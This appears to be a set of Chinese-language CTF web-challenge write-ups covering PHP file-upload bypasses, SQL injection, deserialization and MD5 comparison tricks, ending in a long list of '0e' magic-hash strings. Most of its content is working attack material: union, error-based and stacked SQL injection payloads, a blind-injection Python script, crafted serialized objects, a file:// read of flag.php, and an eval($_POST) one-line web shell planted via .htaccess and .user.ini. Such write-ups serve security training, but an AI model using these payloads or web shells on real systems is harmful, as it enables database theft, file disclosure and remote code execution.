$_FILES['uploaded']['size']; $uploaded_tmp = $_FILES['uploaded']['tmp_name']; if(preg_match("/ph/i", strtolower($uploaded_ext))){ die("后缀名不能有ph!"); } else{ if ((($_FILES["uploaded"]["type"] == " ") || ($_FILES["uploaded"]["type"] == "image/jpeg") || ($_FILES["uploaded"]["type"] == "image/pjpeg")) && ($_FILES["uploaded"]["size"] < 2048)){ $content = file_get_contents($uploaded_tmp); if(preg_match("/\<\?/i", $content)){ die("诶,别蒙我啊,这标志明显还是php啊"); } else{ mkdir(iconv("UTF-8", "GBK", $target_path), 0777, true); move_uploaded_file($uploaded_tmp, $t_path); echo "{$t_path} succesfully uploaded!"; } } else{ die("上传类型也太露骨了吧!"); } } } ?>
上传 .htaccess
修改 Content-Type
上传 ba2in9a-asp.webp
ba2in9a=show_source('/flag');
[网鼎杯 2018]Fakebook dirsearch 扫出了 robots.txt
flag.php
error.php
view.php
db.php
hint robots.txt 提示存在 user.php.bak
<?php class UserInfo { public $name = ""; public $age = 0; public $blog = ""; public function __construct($name, $age, $blog) { $this->name = $name; $this->age = (int)$age; $this->blog = $blog; } function get($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); if($httpCode == 404) { return 404; } curl_close($ch); return $output; } public function getBlogContents () { return $this->get($this->blog); } public function isValidBlog () { $blog = $this->blog; return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog); } }
简单注册登录后发现存在sql注入,扫字典
过滤了 0x7e
select union
no=-1%20order%20by%201,2,3,4,5%23
报错 存在四列数据
no=-1%20union%20select%201,2,3,4%20%23
no hack _
no=-1%20union/**/select%201,2,3,4%20%23
no=-1%20union/**/select%201,@@version_compile_os,3,4%20%23
Linux
no=-1%20union/**/select%201,version(),3,4%20%23
10.2.26-MariaDB-log
no=-1%20union/**/select%201,user(),3,4%20%23
root@localhost
no=-1%20union/**/select%201,database(),3,4%20%23
fakebook
no=-1%20union/**/select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=database()%20%23
users
no=-1%20union/**/select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27users%27%20%23
no,username,passwd,data
no=-1%20union/**/select%201,data,3,4%20from%20users%20%23
O:8:"UserInfo":3:{s:4:"name";s:1:"0";s:3:"age";i:0;s:4:"blog";s:5:"0.com";}
通过伪协议访问 file://var/www/html/flag.php
<?php class UserInfo { public $name = "0"; public $age = 0; public $blog = "file:///var/www/html/flag.php"; } echo serialize(new UserInfo());
O:8:"UserInfo":3:{s:4:"name";s:1:"0";s:3:"age";i:0;s:4:"blog";s:29:"file:///var/www/html/flag.php";}
no=-1%20union/**/select%201,2,3,%27O:8:"UserInfo":3:{s:4:"name";s:1:"0";s:3:"age";i:0;s:4:"blog";s:29:"file:///var/www/html/flag.php";}%27
PD9waHANCg0KJGZsYWcgPSAiZmxhZ3syOTkxM2UxYy0wZDllLTQ2OWEtYTEyNS0xZWZhOGUzMWYxMzF9IjsNCmV4aXQoMCk7DQo=
base64 解码后也会得到相同的内容
<?php $flag = "flag{29913e1c-0d9e-469a-a125-1efa8e31f131}"; exit(0);
也可以 load_file 直接读取
no=-1 union/**/select 1,group_concat(load_file('/var/www/html/flag.php')),3,4 from users #setDefaults
[CISCN2019 华北赛区 Day2 Web1]Hack World 简单测试 拿字典跑了下
当 id 的值为1或2时会查询到以下结果
id=1 => Hello, glzjin wants a girlfriend.
id=2 => Do you want to be my girlfriend?
当 id 的值为其他数字或 @
时回显 Error Occured When Fetch Result.
当 id 的值为
or
and
from
like
insert
delect
update
select
sleep
时回显 bool(false)
当 id 的值为 --+
information
information_schema
separator
floor
xor
时回显 SQL Injection Checked.
尝试
id=if(length((select(flag)from(flag)))=42,1,0)
回显 Hello, glzjin wants a girlfriend.
确认 flag 有42个字符
二分法穷举 来自 inanb 的二分法穷举脚本
import requests import time url = 'http://2bd5e0bf-74ef-4b72-90b8-315541a82d9d.node3.buuoj.cn/' flag="" for x in range(1,43): l = 32 r = 126 while r > l: mid = int((l+r+1) / 2) x = str(x) y = str(mid) id = {"id":'if(ascii(substr((select(flag)from(flag)),'+x+',1))>='+y+',1,0)'} response = requests.post(url=url,data=id) if "Hello" in response.text: l = mid else: r = mid-1 time.sleep(0.03) flag+=(chr(int(r))) print(chr(int(r))) print(flag)
[GYCTF2020]Blacklist 联合注入
error 1054 : Unknown column '3' in 'order clause'
return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);
堆叠注入
array(1) { [0]=> string(8) "FlagHere" } array(1) { [0]=> string(5) "words" }
array(6) { [0]=> string(4) "flag" [1]=> string(12) "varchar(100)" [2]=> string(2) "NO" [3]=> string(0) "" [4]=> NULL [5]=> string(0) "" }
handler查询 [强网杯 2019]随便注 但过滤了 set
prepare
alter
rename
改用 HANDLER 语句查询
-1';handler FlagHere open;handler FlagHere read first;handler FlagHere close; #
[GXYCTF2019]BabySQli mysqli_query($con,'SET NAMES UTF8'); $name = $_POST['name']; $password = $_POST['pw']; $t_pw = md5($password); $sql = "select * from user where username = '".$name."'"; // echo $sql; $result = mysqli_query($con, $sql); if(preg_match("/\(|\)|\=|or/", $name)){ die("do not hack me!"); } else{ if (!$result) { printf("Error: %s\n", mysqli_error($con)); exit(); } else{ // echo '<pre>'; $arr = mysqli_fetch_row($result); // print_r($arr); if($arr[1] == "admin"){ if(md5($password) == $arr[2]){ echo $flag; } else{ die("wrong pass!"); } } else{ die("wrong user!"); } } }
hint MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5
base32 解码
c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW1lJw==
base64 解码
select * from user where username = '$name'
试出 username 是 admin
fuzz 过滤了 (
)
=
or
xor
order
等关键字
第二列数据为用户名,第三列数据为 MD5 加密的密码
name=' union select 1,'admin','21232f297a57a5a743894a0e4a801fc3' #&pw=admin
[网鼎杯 2020 青龙组]AreUSerialz <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $content = "Hello World!"; $this->process(); } public function process() { if($this->op == "1") { $this->write(); } else if($this->op == "2") { $res = $this->read(); $this->output($res); } else { $this->output("Bad Hacker!"); } } private function write() { if(isset($this->filename) && isset($this->content)) { if(strlen((string)$this->content) > 100) { $this->output("Too long!"); die(); } $res = file_put_contents($this->filename, $this->content); if($res) $this->output("Successful!"); else $this->output("Failed!"); } else { $this->output("Failed!"); } } private function read() { $res = ""; if(isset($this->filename)) { $res = file_get_contents($this->filename); } return $res; } private function output($s) { echo "[Result]: <br>"; echo $s; } function __destruct() { if($this->op === "2") $this->op = "1"; $this->content = ""; $this->process(); } } function is_valid($s) { for($i = 0; $i < strlen($s); $i++) if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125)) return false; return true; } if(isset($_GET{'str'})) { $str = (string)$_GET['str']; if(is_valid($str)) { $obj = unserialize($str); } }
is_valid 方法限制字符的ASCII码为32-125,确保为可打印字符,而 protected 属性序列化后在变量名前添加标记\00*\00
,\00
对应空字符(null)
PHP版本7.1+对属性的类型不敏感,可用 public 属性替换 protected 属性
__destruct 方法需绕过强类型比较 使用 op=" 2"
或 op=2
绕过
<?php class FileHandler { public $op = " 2"; public $filename = "flag.php"; public $content = ""; } echo serialize(new FileHandler()); ?>
?str=O:11:"FileHandler":3:{s:2:"op";s:4:" 2";s:8:"filename";s:8:"flag.php";s:7:"content";s:0:"";}
[MRCTF2020]Ez_bypass include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id !== $gg) { echo 'You got the first step'; if(isset($_POST['passwd'])) { $passwd=$_POST['passwd']; if (!is_numeric($passwd)) { if($passwd==1234567) { echo 'Good Job!'; highlight_file('flag.php'); die('By Retr_0'); } else { echo "can you think twice??"; } } else{ echo 'You can not get it !'; } } else{ die('only one way to get the flag'); } } else { echo "You are not a real hacker!"; } } else{ die('Please input first'); } }
数组绕过强类型比较 ?id[]=0&gg[]=1
字符串或 %00 绕过 is_numeric passwd=1234567a
passwd=1234567%00
[MRCTF2020]你传你🐎呢 .htaccess
修改 Content-Type
/var/www/html/upload/315f3ebf1b34561a6edd5834019ba782/.htaccess succesfully uploaded!
一句话
修改 Content-Type
/var/www/html/upload/315f3ebf1b34561a6edd5834019ba782/ba2in9a-php.webp succesfully uploaded!
ba2in9a=var_dump(scandir("/")); ba2in9a=var_dump(file_get_contents("/flag"));
[极客大挑战 2019]HardSQL fuzz 过滤了
!
&
*
+
<
>
=
|
\\
if
and
union
drop
having
mid
sleep
hex
char
ascii
substr
greatest
等关键字
报错注入 查看数据库基础信息 'or(updatexml(1,concat(0x7e,version(),0x7e),1))#
XPATH syntax error: ‘10.3.18-MariaDB‘
'or(updatexml(1,concat(0x7e,database(),0x7e),1))#
XPATH syntax error: ‘geek‘
查表 'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#
XPATH syntax error: ‘H4rDsq1‘
查字段 'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#
XPATH syntax error: ‘id,username,password‘
查数据 'or(updatexml(1,concat(0x7e,(select(group_concat(username,'~',password))from(H4rDsq1)),0x7e),1))#
XPATH syntax error: ‘flagflag{db016904-4690-4025-94’
注意 updatexml() 仅能显示32个字符,若所需数据超出此长度限制,可结合 right() 使用
'or(updatexml(1,concat(0x7e,(select(group_concat((right(password,30))))from(H4rDsq1)),0x7e),1))#
XPATH syntax error: ‘4-4690-4025-94c4-f546273a2d1e}‘
[SUCTF 2019]CheckIn <?php // error_reporting(0); $userdir = "uploads/" . md5($_SERVER["REMOTE_ADDR"]); if (!file_exists($userdir)) { mkdir($userdir, 0777, true); } file_put_contents($userdir . "/index.php", ""); if (isset($_POST["upload"])) { $tmp_name = $_FILES["fileUpload"]["tmp_name"]; $name = $_FILES["fileUpload"]["name"]; if (!$tmp_name) { die("filesize too big!"); } if (!$name) { die("filename cannot be empty!"); } $extension = substr($name, strrpos($name, ".") + 1); if (preg_match("/ph|htacess/i", $extension)) { die("illegal suffix!"); } if (mb_strpos(file_get_contents($tmp_name), "<?") !== FALSE) { die("<? in contents!"); } $image_type = exif_imagetype($tmp_name); if (!$image_type) { die("exif_imagetype:not image!"); } $upload_file_path = $userdir . "/" . $name; move_uploaded_file($tmp_name, $upload_file_path); echo "Your dir " . $userdir. ' <br>'; echo 'Your files : <br>'; var_dump(scandir($userdir)); }
.user.ini auto_prepend_file 主文件前解析后包含
auto_append_file 主文件后解析后包含
exif_imagetype GIF89a 文件头绕过 exif_imagetype 函数
.user.ini
GIF89a? auto_append_file=ba2in9a-asp.webp
ba2in9a-asp.webp
GIF89a? <script language="php">eval($_POST['ba2in9a']);</script>
扫描根目录
ba2in9a=var_dump(scandir("/"));
输出文件内容
ba2in9a=var_dump(file_get_contents("/flag"));
[ZJCTF 2019]NiZhuanSiWei <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(preg_match("/flag/",$file)){ echo "Not now!"; exit(); }else{ include($file); //useless.php $password = unserialize($password); echo $password; } } else{ highlight_file(__FILE__); } ?>
data:// 使用 data:// 封装协议将所需内容写入 text
?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
php://filter 使用 php://filter 封装协议读取 useless.php
?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY&file=php://filter/read=convert.base64-encode/resource=useless.php
PD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWMgZnVuY3Rpb24gX190b3N0cmluZygpeyAgCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsgIAogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgCiAgICAgICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIHJldHVybiAoIlUgUiBTTyBDTE9TRSAhLy8vQ09NRSBPTiBQTFoiKTsKICAgICAgICB9ICAKICAgIH0gIAp9ICAKPz4gIAo=
<?php class Flag{ //flag.php public $file; public function __tostring(){ if(isset($this->file)){ echo file_get_contents($this->file); echo "<br>"; return ("U R SO CLOSE !///COME ON PLZ"); } } } ?>
构造序列化
<?php class Flag{ public $file='flag.php'; public function __tostring(){ if(isset($this->file)){ echo file_get_contents($this->file); } } } print_r(serialize(new Flag())); ?>
序列化
O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
payload ?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
[BJDCTF2020]Easy MD5 hint 响应头(Response header)存在提示
select * from 'admin' where password=md5($pass,true)
绕过 绕过 md5 函数实现注入
字符串一
md5 加密
276f722736c95d99e921722cf9ed621c
转字符串
'or'6É]é!r,ùíb 'or'6?]??!r,??b 'or'6ɝ⬹�
与 sql 闭合实现永真
字符串二 129581926211651571912466741651878684928
md5 加密
06da5430449f8f6f23dfc1276f722738
转字符串
ÚT0Do#ßÁ'or'8 ?T0D??o#??'or'8 ڔ0D㟁'or'8
测试未成功
源码 leveldo4.php 源码中也指出 password 是 ffifdyop
<?php error_reporting(0); $password = $_GET['password']; if($password == 'ffifdyop') { echo "<script>window.location.replace('./levels91.php')</script>"; } ?>
第二步 绕过弱类型比较
levels91.php
<?php error_reporting(0); $a = $_GET['a']; $b = $_GET['b']; if($a != $b && md5($a) == md5($b)){ echo "<script>window.location.replace('./levell14.php')</script>"; } ?>
数组绕过 md5 不能处理数组,会直接返回 null, 此时两个数组进行比较时恒等
0e绕过 字符串 md5 加密后以 0e 开头,被当作使用科学计数法的数字进行比较,所以恒等
240610708:0e462097431906509019562988736854 QLTHNDT:0e405967825401955372549139051580 QNKCDZO:0e830400451993494058024219903391 PJNPDWY:0e291529052894702774557631701704 NWWKITQ:0e763082070976038347657360817689 NOOPCJF:0e818888003657176127862245791911 MMHUWUV:0e701732711630150438129209816536 MAUXXQC:0e478478466848439040434801845361 IHKFRNS:0e256160682445802696926137988570 GZECLQZ:0e537612333747236407713628225676 GGHMVOE:0e362766013028313274586933780773 GEGHBXL:0e248776895502908863709684713578 EEIZDOI:0e782601363539291779881938479162 DYAXWCA:0e424759758842488633464374063001 DQWRASX:0e742373665639232907775599582643 BRTKUJZ:00e57640477961333848717747276704 ABJIHVY:0e755264355178451322893275696586 aaaXXAYW:0e540853622400160407992788832284 aabg7XSs:0e087386482136013740957780965295 aabC9RqS:0e041022518165728065344349536299 etqaTTFXeujI:0e873986795817250807369213941548 rr6HVrfwfQRK:0e390310578034127565575710199239 94da2KWOk2sD:0e522608713252938409614536178159 LIgjRwsEBV0G:0e476487496670573057723083165712 0Jh28Lv3IQPB:0e552943749576940357419042912841 5lYWomyrSgBi:00e82203671254360601934759406438 af8UF09z8S5B:0e880812032272171076911479094143 z5w4fxbnwoRP:0e676399623216539720736975162129 Ylp5Ocx5YCMV:0e176345976414440291009492284364 fh70QgaGIfYM:0e564472166873750526572156675923 UEaXPm4IIDp3:0e461721121374870411609769578212 suerFfjLQRmk:0e060125509800398574391675067075 0gdVIdSQL8Cm:0e366928091944678781059722345471 XJFYZ1MgeUcb:00e93967150195561843942349513469 wzXzQTGIx9VU:0e296679956971343764470376014802 3lciznK1MgbK:0e247293857347608753400314349379 JlJHHNWI3Oe6:0e027927343820705863215577441770 VW2zJhj2i8HR:0e252975277424098750450405547604 K7sy5q0K1RWS:0e987529109273801660943537750499 6KwzsyoreGnR:0e536008331452600778000468162358 Pz68mMqTxewH:0e883694193916844326948973611295 SJZQeL9hZ5AA:0e424294048497888001893529971403 76AG0EeoTxu3:0e096469501119857795175476384647 GvhhzTLwb98D:0e070302641246420537823173917716 C25B40bwF7oH:0e107651412534430122444310727335 LIkyqkm1p3JR:0e849446873586376930140138357778 1R7jqMIf6T7t:0e381567347928220347073343854712 jDg4hnyPwqal:0e905060392130117790735726467859 f6y7VrJlOBsI:0e914949007364385803648138798605 KXsU0AZ2PtRe:0e448778299130864449509797129898 H0UPp7mFA9SF:0e525419864591945406262998227563 JH4cGnwKzd0y:0e545428394516071575146741684795 MFGELCHzOwZK:0e767295899498195380697332834436 sQcRTBkePLSY:0e576163277785256730155739473379 fQvn3oAoYNfo:0e935872100939536813194636270943 VZQB1k9L5B7d:0eb93088111953185174046674351486 r3VyM4vgXTwp:0e971379756057125072238845041250 Ci85vdBF8fyf:0e183864284211506298675869366648 XgExkg0OSTWh:0eb21820378827332451464430798697 lFl7hFE2fZ89:0e038598152105620891422974861596 qXw0rVneiXQ0:0e894353687104732687786635214136 4Ryf8m1aUuos:0ed28945221302591847978449153264 TMonekAePscz:0ea90264385679456791019887225991 8aNwhejGhaBg:0e439849245165078778802700229873 gfxggQd5tJx3:0e731449381626093091793513404050 RSnakeUecYwT6N2O9g:0e126635149374886577950106830662 RSnakeIeNRSb8KjzTw:0e756073880949659567751252231576 RSnaker4hvtQIOrpOL:0ef65491276193866976262495578569 RSnake4KmfuX8QNCrf:0ea53603712327886946538710356586 RSnakectUSa1OLsZKq:0e249086601945526783602356278673 RSnakeDPoevzFRccil:0e024555713478934332659658118180 RSnakeDIs9W5Hwh4RI:0ed83429501266915038692525714483 RSnake6LuV2EeUCQT9:0e019285890012675326970853669352 RSnakeunZpMM36jWRc:0ef91664263600485432881263069170 RSnakeCN28H7ARqbWo:0eb96344658110042953525224062897 RSnakeeiEfFs2sDvBl:00e49650706719659997081024412456 RSnakeKX0luCScPTlA:0e090929726083772016603384876954 RSnake9YML3vVKDyVM:0e931397641908567179613657463230 RSnakeeDU1jeZP0y6u:0eb41746678067233356940544958830 RSnakeZiHfaf4AjRSu:0e964760122122507558510301894707 RSnake2FSf8M9wewCp:0e663260936156214376380910821202 RSnakeeaQyyx5CdJEL:0ea96476364525234814003638575853 RSnakeTk2IL3bXxrAC:0e853966415201907882218435953878 RSnakeEHcLoKzHpfbZ:0e942355771645636795619261311622 RSnake8GuHGIMTkrTD:0ea70327014428107205836228338816 RSnakejsZODVeHtL8J:0ee95969805366297925576732214029 RSnakeC0830jN1tf7O:0e052566796022527677703658434604 RSnake4DkeFu1e2SWr:0e600123384457131209132592175638 RSnakey6xDdo9q5FGW:0e810763761302115893884702703844 RSnakeKd8uCbfCeQ0o:0e731166959245640967022771564684 RSnake0Tm0M3AishG3:0e463249761046685126659935619668 RSnake51ZgTONSHR2Y:0ed33059556258086974875447876416 RSnakegcJDRRgf0U6m:0ef50854419179481189879935461045 RSnakewVhax4CuZvXf:0e969150246784517533191246408521 RSnakeX7VmFsdfGCeN:0eb39549850075118461895635919058 RSnakeeAkSiKkfjhg5:0e328551463697730337691527967652 RSnakeXAajyRGqsyTV:0e126217242363062792274495713166 RSnakeUN3g0sRq9X8u:0e527915370591664597242693926727 RSnakeDmg3wZ3el6Gw:0e025551054370458644586403691610 RSnakegb7AeowBXoc0:0ee37127518715729207824340169151 RSnakeVkXTec730R4j:0e502364472144982857192590869744 RSnakeb10HFo3IPQ6h:0e732117148004958779182858536990 RSnake1ABWDV22cgWf:0e457496054833900987889666775116 RSnake1L7TBMoOtCbK:0e699815913563873875266079686664 RSnakeWZyseGFM4XTM:00e76406687914702217897625303372 RSnakePZqyNVboAIB0:0e078797531434036768367559385297 RSnakehabxfvMKhpOv:0e697369971494869826413604586581 RSnakeGnPZZ1VZyXcV:0eb64175721325153230401232293315 RSnakeUGaguCSPCJYY:0ed71930195460522478633772575290 RSnakeRtZgKetPUamR:0e074760013367177502192270815625 RSnakeQ04eeHDeeOXU:0e074190594274270431349335477921 RSnakef0BO7lp6Th3W:0e764949368069072045196388521865 RSnakenug1uDXQt7Iv:0ec67338059701463792777215772734 RSnakeC3gXukyk1q0m:0e601959717847074232869477323026 RSnakez1e7Oyi6uuls:0e021177200447735015356971031921 RSnakehOwNif5RlEJN:00e88998412786603066488766572631 RSnakehiQ1fICqo6LA:0e453499463434434754387288377524 RSnakeXKPLlGdf2gYf:0e634506090174107853159384135687 RSnakeRsGzXAYo0JNj:0ea15673050850040596297554136904 RSnakezCopesJFQATe:0e070078800181583050892160625194 RSnakeEBQANS2agZQa:0ef84418091629785329034046180298 RSnake0IexB5ASh835:0ef61674257494387742486696449693 RSnakeUaE1SOBZOBlp:0e096932402637733060146852211580 RSnakewRaUZrfzRJd8:0ea15298596110949330590213153621 RSnakenznElX7zltVg:0eb11422135237478771912924355863 RSnakeUBveDBuGLzn1:0ea93220458387084292797896338339 RSnakerLbmB3GmwhQj:0ea24305267217862954133256679599 RSnake_the_King_4000141637680:00e11893775978043981869465759606 spazef0rze_1200003012612:0e710274968408547509637852155342 hashcatfsfxKcdsNeb5:0e903190981462662531625558386605 hashcatnqAd7pmtnS6E:0ed79166800676590411693158196899 hashcat8EbDj5owfLVT:0ed20108381450617146587076403374 hashcathswsP25UXbaY:0ef72621370226266918540716895907 hashcatinls5sxPRfs4:0e008198203488965284265444165616 hashcatdsZxzcAn7bMG:0ef78945997469804846763158288124 hashcat1YyA1g6oF1FZ:0ec90497773189564921974134421492 hashcatr3V7kU69oHaX:0e629484198526644284541157337823 hashcatXFoYEW5xvhrR:0ef54513011862173157038880179669 hashcatnqGe91mhdmJL:00e97587549148132332584993856101 hashcatfPsXKmXWoahm:0e294157022803076449661086491633 hashcatj3CB1Uw31R1B:0eb53493166742192510438503774348 hashcatjMgDymyIUTOp:0ef28594657620374960617662584943 hashcathYPsBaMGgU9h:00e41735841504397670224983312865 hashcatwcCx1uR4Jprn:0e192387500119144940543589871051 hashcatYe4S36r5fJDm:0e697741935429285291249437201427 hashcatPRnmIWlX9WPc:0e713554192892592207918637368778 hashcatsXLw487BJKKA:0ef82274437943154664919965739010 hashcatHs44KveHFeyB:0ed48932947782431585928958543499 hashcatbdx8Eve3TvDI:0e180273134459787920679105396890 hashcatRkfOcf3tazuI:0ee60908266239921612442277028478 hashcatOFXQepbdDiJp:00e35712421886644709539392249393 hashcatdfeMgVuxu7gf:0e169197575097809523854569778352 hashcats40e5zKszXtC:0eb80103486333320853663220547702 hashcata68WxZlK6Goy:0e875405291819069232049945618037 hashcatrPagY0yCHYWb:00e09882601873365218948520930847 hashcathaa1xDJMJVRC:0e571046416076977261801376038048 hashcatOjeub6ZMZKm5:0e788527789870181469533381742838 hashcateR893B4eAdZF:0e144579778150395607081073445146 hashcat9GosjkD9Ug38:0e408087357085099162195921667528 hashcatBSFYcYynwBSn:0ef32371130975581793158356886748 hashcatbkpFeQlGyG9W:0e029814416706774536200181074292 hashcatpfBhg4rhNRdL:0ee15757025693367795639306521491 hashcatf6dEmjpuChhH:0ee51416933327621708076527927275 hashcatgThUxH6MOf9I:0ef02473426562641560440412761722 hashcatrmz6OLffiG1h:0e885817045808513848992271430281 hashcatWm7WDyAGsqfA:0e346711282270627882083667182735 hashcat9A0p8S2VF6WR:0eb26656906880720687862361611253 hashcatzFGyzckAqAnJ:0e247981224210103389675703836804 hashcat6cfQEg78PmNR:0e184676765284891947674829626951 hashcatqvecWTkfic3I:0eb29360374680505575803746854932 hashcatNeci3wsAyH8d:0e072743999878721561251634052447 hashcats45f35ADICud:0e959921591712455769708084958456 hashcatxPW6txfRv0Sd:0e580448986130114663523089167516 hashcatUELyl2lbOpv9:0e627167386046552708286348016475 hashcatogfgny8PI4K9:0e036402558842525229204199477050 hashcatSIt2e5QfmByY:0e101666357206112681081748455320 hashcati0iOySpyxfxw:0e117796363501697027222953452674 hashcatqgZkv0yUR7bD:0e518259621249173316480085853775 hashcatexH58x6Bu5NY:0ed69719102850251217953475327085 hashcatF6s8OvsSxkhT:0e761657316022180429758325384657 hashcatA97bwSGJNe7k:0e355970557372440216920998975222 hashcat218LttLIg7Xm:0ef20180960250338718429233550861 hashcatNxt7gG7wCO97:0eb27520620314458450279649491956 hashcat90QDpbUkB0Ok:0e436314378402734111611712654026 hashcatb1ZgAABzM0Bf:0e946119446142642672858262832757 hashcatUf20DRSvx3cL:0ee20311665022977945172870623927 hashcatMRWSlWe05Zvp:0ea34183380125537235698152703631 hashcatKPVSTbbjqx3R:0e484369305169417649070905006315 hashcat0JkyaT0zfq4J:0ed22604657931750807530689526355 hashcatHKUy9GDHqVUb:0e653326767131355956161110469880 hashcattemLCPhgMmqL:0e631431734866553918413248642686 hashcatObRAnlIWKC8d:0ef27592244074741276205927202324 hashcat8oL17k6qk0gz:0ee73358262213033449654829838621 hashcatsB4SOwuGVuoe:0e333130585586305213577039927427 hashcati1GU40wDiOtJ:0ee11440449892563603908564275693 hashcatbMfE1nJW3PfS:0e901351436865764070859051398466 hashcatqlffzszeRcrt:0e242700999142460696437005736231 hashcatKn0bX5xTgV54:0e239074099038376915511163014383 hashcatfaXyv0NCydC2:00e78170913509171886364696947933 hashcatELKhrlNIlXAz:0ec00053106946393237318089678345 hashcatFZZ1OL8eacJj:0e544759073985063895056720000601 hashcatglCxMkqUOJwD:0e891676190649193842031508414124 hashcatLuQtDnSmdvf4:0e551613790717508526393660811028 hashcatJZ6zKjnDjSmP:0e957569938257781069678186971676 hashcatgcbkcHMJDYfo:0e778781420740711204571028212537 hashcatyEnN0AWDXEJj:00e78652260218430366515810097082 hashcatgEyFYuuwo206:0ed18617980884920471439353879013 hashcatx3Q3sVuRTzZf:0e107806662474608626243242623178 hashcat3iKHJQyTSPzT:0ec38017339220834055407867659893 hashcatnqsky8EaPhZY:0ea54041584253883176394189001413 hashcatj8i4CRvfTn6Q:0e164879675821490800383352471267 hashcatAncod29V4vrB:0eb40162176777666089546818513308 hashcatAI7W4Xf5qMAa:0ed11235495038495675309094002675 hashcatVX5KGaAxO37C:0ee18660142227578830299076471060 hashcatLSevfGjMib7z:0ef94806912787942506104369088120 hashcatweONL6TgUOeX:0e879034299586173661436974677516 hashcataD3Lp5Syji6a:0e535955911746832994456280697563 hashcatZjRe3wVwimeh:0e402537864182105121764499750206 hashcatjic1v8689j6J:0e154499221314249635525178651457 hashcatIZFfBisncyQB:0ec30474031066987435737602946383 hashcattSgs5m7NSzy6:0e249732113617303873999818367704 hashcatZQktzx9ms4ka:0e851827184221990365882765762026 hashcatidLgolWJSzrx:0e760659789811566699476240165608 hashcatSppglsswztvb:0e868690772629271014442727686201 hashcatK5hSQ7iQHm3C:0eb89528718762908134410955812049 hashcatoNfFqC6Io8U1:0e544071674105476245212118785762 hashcatTAIj3dG2G88F:00e21165511946133652979395746247 hashcatde9XUCz98sxF:0e845856619305429905294795223862 hashcatGBree35KhFQl:0e481083164060168518602691315134 hashcatqZjRbZkeVcA2:0e788248204976275056321855467193 hashcatHLj0fmus6oh0:0ea06412255480296796669846331760 hashcatIiW8ezvFBvR7:00e76915435845087660262486971544 hashcatThfyrXoumYcE:0e486802182204901515938066198224 hashcatJwcJRfArcgUR:0e967214930623954488921841383017 hashcatscGLuTJZjdKQ:0e522399875920163409892231895481 hashcatxgD29e0YtTej:0e844185588819980251553352078116 hashcatF58gxOpeYrJ2:0ed70294867221053172594698800809 hashcatL9VEe5VXcieS:0e043552498983315659673380698314 hashcatgEXSFjwOf6hq:0e221326925297238319205562403775 hashcat8fZi9zfuNZ98:0ea35230842676265549075202368418 hashcatU3UAjuDwmpu0:0ed64473741254375792597617298320 hashcatY8em0aOEpkLK:0e937094300163513903046235959376 hashcataDDoSjnU2gEr:0e078951774517171775068618837762 hashcatHjBj1IelQBLZ:0e950597873615517725342655425676 hashcatTqaIbDrhQes1:0e687068666718182383557043953615 hashcatnzNeorwueIyn:0e065833805870206104769091610143 hashcatdQjcexb8H6yW:0e022232332677582357629641454394 hashcatDuErP07oodqe:0ec22796471841009514558301553023 hashcatv0OjhDmdIGkx:0eb75234122593032202383451028536 hashcatixaDzU1DL0hN:0ef88228580762975171457711268681 hashcatgjlG3p8b0dMS:0ea91354418927530903763416843291 hashcatja8R0AUxKp5j:00e33928319980525556260699609455 hashcatVsKS8jETo43J:0e060623422950460103744994537275 hashcataUpmfeLfShFB:0e566330500563397747235750234034 hashcatbTmlWY6y85KS:0ee13325826707023263360923234976 hashcat4CPdqrLOkjqf:0ee42471186025357978644620703909 hashcatCIG02Qph95e6:0e167336967249208668983353612551 hashcatAl5znMArGpiC:0e679536762501723662842305349946 hashcatwYIe3t1StCJK:0e655099752955237071924454045565 hashcatgzoVmkTOnSPf:0ea86023202885175720452845581289 hashcatjGpLOBeXCg16:0e595165694879612479699744301452 hashcat5J6jMvdHoxlP:0e136280995332446050419927097446 hashcat7ljW6KaYqw1K:0ee82516688966692184934311381550 hashcat1BDHGvGYMVpn:0e404354171460149880658255644172 hashcatTtm5xsugIInK:0e327816715263020551157994642262 hashcatgffFv8hWa3Bl:0e266635146281201862140250013547 hashcati0r5FBiNYeug:0e246045807419548494953409205770 hashcat1kX85sfk0g4y:0e382514914454869222086887708252 hashcat2yHRI4DyHI3O:0ed55522879873085011349168357626 